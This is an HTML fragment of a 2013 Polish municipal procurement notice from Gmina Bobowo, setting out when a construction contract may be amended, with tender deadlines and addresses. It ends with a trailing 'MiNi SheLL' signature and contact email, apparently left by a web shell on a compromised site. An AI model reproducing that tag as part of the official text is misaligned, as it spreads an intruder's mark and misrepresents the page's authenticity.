<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do złożonej oferty i na niżej wymienionych
warunkach:
1. w stosunku do terminu realizacji umowy:
   a) konieczności zlecenia prac dodatkowych w trybie zgodnym z przepisami Ustawy;
   b) zmiany przepisów powodujących konieczność innych rozwiązań, niż zakładano w 
       opisie przedmiotu zamówienia lub SIWZ;
   c) zmiany przepisów powodujących konieczność uzyskania dokumentów, które te 
       przepisy narzucają;
2. w stosunku do osób:
   a) zmiany osób reprezentujących w przypadku zmian organizacyjnych;
   b) zmiany osób realizujących zadania pod warunkiem, że osoby te będą spełniały  
       wymagania określone w SIWZ;
3. inne:
    a) w przypadku zmiany urzędowej stawki VAT;
    b) w przypadku zmiany będącej następstwem okoliczności leżących po 
        stronie Zamawiającego, w szczególności:
nieterminowe przekazanie terenu budowy przez Zamawiającego;
wstrzymanie robót przez Zamawiającego;
wykonanie przez Zamawiającego robót budowlanych bez realizacji 
           Których Wykonawca nie może w sposób należyty wykonywać przedmiotu  
           umowy, z przekroczeniem terminów wskazanych dla wykonania tych robót 
           w Warunkach Szczególnych umowy.
    c) zmiany nazwy zadania;
II. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.
1. Zmiana terminu realizacji przedmiotu umowy
   1). Zmiany spowodowane warunkami atmosferycznymi, geologicznymi, 
        archeologicznymi, w szczególności:
        a) klęski żywiołowe;
        b) warunki atmosferyczne uniemożliwiające przeprowadzanie prób i sprawdzeń, 
        c) niewypały i niewybuchy,
    2). Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, 
         w szczególności:
         a) nieterminowe przekazanie terenu budowy przez Zamawiającego;
         b) wstrzymanie robót przez Zamawiającego;
         c) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji 
             projektowej;

    3). Zmiany będące następstwem działania organów administracji, w szczególności:
         a) przekroczenie zakreślonych przez prawo terminów wydawania przez organy   
             administracji decyzji, zezwoleń, uzgodnień itp.;
         b) odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, 
             uzgodnień na skutek błędów w dokumentacji projektowej
   4). Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz wykonawcy 
        skutkujące niemożliwością prowadzenia prac w szczególności:
        a) brak możliwości dojazdu oraz transportu materiałów na teren budowy 
            spowodowany awariami, remontami lub przebudowami dróg dojazdowych,
        b) protesty mieszkańców,
        c) przerwa w dostawie energii elektrycznej, wody, gazu,
   5). Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy, 
        mimo iż opóźnienie w jej wykonaniu będzie następstwem okoliczności, za które    
        odpowiada Wykonawca (w takim przypadku wysokość wynagrodzenia 
        Wykonawcy może zostać obniżona o kwotę nie większą niż równowartość 
        połowy kar umownych, które Wykonawca byłby zobowiązany zapłacić
        Zamawiającemu za takie opóźnienie, lecz niższą niż kwota tych kar), jeżeli:
        a) Wykonawca powiadomi Zamawiającego najpóźniej na 10 przed upływem  
            terminu wykonania umowy, o niemożliwości ukończenia jej wykonywania w 
            tym terminie;
        b) Wykonawca zaproponuje nowy termin zakończenia wykonywania umowy;
        c) Wykonawca zaproponuje Zamawiającemu zrekompensowanie powstałego 
            opóźnienia, w tym przez przedłużenie okresu gwarancji.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 1) - 4) termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
2. Zmiana sposobu spełnienia świadczenia
1). Zmiany technologiczne, w szczególności:
      a) niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji 
          projektowej spowodowana zaprzestaniem produkcji lub wycofaniem z rynku 
          tych materiałów lub urządzeń;
      b) pojawienie się na rynku materiałów lub urządzeń nowszej generacji 
          pozwalających na zaoszczędzenie kosztów eksploatacji wykonanego 
          przedmiotu umowy;
      c) pojawienie się nowszej technologii wykonania zaprojektowanych robót 
          pozwalającej na zaoszczędzenie czasu realizacji inwestycji jak również kosztów 
          eksploatacji wykonanego przedmiotu umowy;
      d) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań
          technicznych/technologicznych lub materiałowych niż wskazane w dokumentacji
          projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło
          niewykonaniem lub wadliwym wykonaniem projektu,
      e) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań  
           technicznych lub materiałowych ze względu na zmiany obowiązującego prawa
3. Zmiany osobowe
      a) zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na 
          inne legitymujące się co najmniej równoważnymi uprawnieniami, o których   
          mowa w ustawie Prawo budowlane;
      b) zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot 
          umowy na innego dysponującego co najmniej porównywalnym   
          doświadczeniem, potencjałem  technicznym i osobowym;
      c) rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie  
          wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do skrócenia     
          terminu wykonania przedmiotu umowy, zmniejszenia należnego wykonawcy 
          wynagrodzenia lub zastosowania przy wykonaniu przedmiotu umowy bardziej  
          zaawansowanych rozwiązań technologicznych w porównaniu do wskazanych w  
          SIWZ.


4. Pozostałe zmiany
      a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
      b) zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować  
          zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający   
          dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w  
          kwocie podatku zapłaconego przez wykonawcę,
     c) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim  
         przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, 
         przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz  
         udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z  
         umowy planowanymi świadczeniami.
     d) zmiany uzasadnione okolicznościami o których mowa w art. 357.1 Kc z 
         uwzględnieniem faktu, że za rażącą zostanie uznana strata w wysokości, o   
         której mowa w art. 397 ksh.
III. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający 
     może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej 
     zgody.
IV. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień 
     publicznych:
     a) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy 
         (np. zmiana numeru rachunku bankowego, zmiana dokumentów 
         potwierdzających uregulowanie płatności wobec podwykonawców);
    b) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy 
        Stronami;
    c) udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach  
        publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bobowo.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bobowo, ul. Gdańska 12, pokój nr 10 po złożeniu stosownego zamówienia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2013 godzina 10:00, miejsce: Urząd Gminy Bobowo, ul. Gdańska 12, pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com